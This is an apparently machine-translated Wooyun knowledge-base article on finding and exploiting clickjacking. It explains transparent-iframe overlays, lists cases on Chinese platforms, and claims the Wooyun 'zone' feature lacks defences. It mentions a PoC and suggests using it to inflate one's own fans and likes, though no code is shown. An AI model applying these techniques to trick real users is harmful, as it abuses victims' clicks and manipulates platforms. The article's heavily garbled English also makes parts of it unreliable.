Exploitation and utilization of clickjacking vulnerability

0x00 brief introduction

1 Speaking of clickjacking, Many people actually don't know what it is . Compared with XSS Come on ,clickjacking It seems mysterious , There are no related vulnerabilities in the dark cloud vulnerability library 10 That's all .

2 Sleepy dragon sent an article before clickjacking Technical documentation for , It's mainly about clickjacking The reason for this , And the method of defense . Here I mainly introduce , How to find clickjacking And how to use . Clickjacking Brief introduction

As a reminder click jacking and json hijacking Not a thing at all , Don't confuse here .

0x01 Case study

1 ClickJacking

Tencent micro-blog ClickhiJacking

Sina Weibo Click to hijack fans

2 Xss combination ClickJacking

Baidu master station reflection type XSS Loophole

One place in Baidu Post Bar Mouseover XSS utilize

Baidu translation reflexive XSS（ Clickjacking demo）

You can see the cooperation clickjacking, Some of them look like chicken help XSS Or humble settings , It will also cause serious damage .

0x02 Instance to explain

Said so much , I don't know if I understand . Take a look at the following example .

Use another low-level vulnerability to silently push and install arbitrary applications to the background of Peapod users' mobile phones

He designed a page by himself , And then there was a fake button on it , And then iframe The push of the nested original web page overlaps with the button for accepting the award .

But I don't know if it's a clerical error of the cave master , It's the cave master who thinks clickjacking There are still some mistakes in the description of .

There is obviously something wrong with the description of the cave owner .

The correct principle should be like this , The page for receiving the award is at the bottom , But the original iframe The page of is at the top . Then the first graph will be iframe Completely transparent , So the user can only see the following award receiving page . Then the user clicks to receive the award , Actually, I clicked the push in the upper page .

So the position of the blue circle , Should be “ above ” instead of “ below ”.

0x03 Zone ClickJacking mining

I saw the following of this article about sleepy dragon , Jianxin said he should give it to zone Thanks plus clickjacking Defense .

Then I took a look ,zone Thank you for adding confrim, But in fact, this can only alleviate clickjacking The power of , It can't be cured , It is entirely possible to construct 2 A point cheated the user to click .

then zone Focus on 、 like 、 Don't like these features and have no defense , Visual measurement zone There should be no defense at all clickjacking. But I tried , Dark cloud master station is still right clickjacking Defensive , Will detect url Is there a quilt iframe nesting .

Here is a test poc, Those who are interested can do their own research to make better use of the environment .

Use this clickjacking Of poc Code , You can brush some dark clouds for yourself zone The fans of .

meanwhile , You can also give yourself zone The number of post brushes inside . It is said that the quantity of this favorite is the same as zone Inside the Lord algorithm is closely related to the amount !

This article comes from the dark cloud knowledge base , The copyright of this article belongs to Wuyun knowledge base ！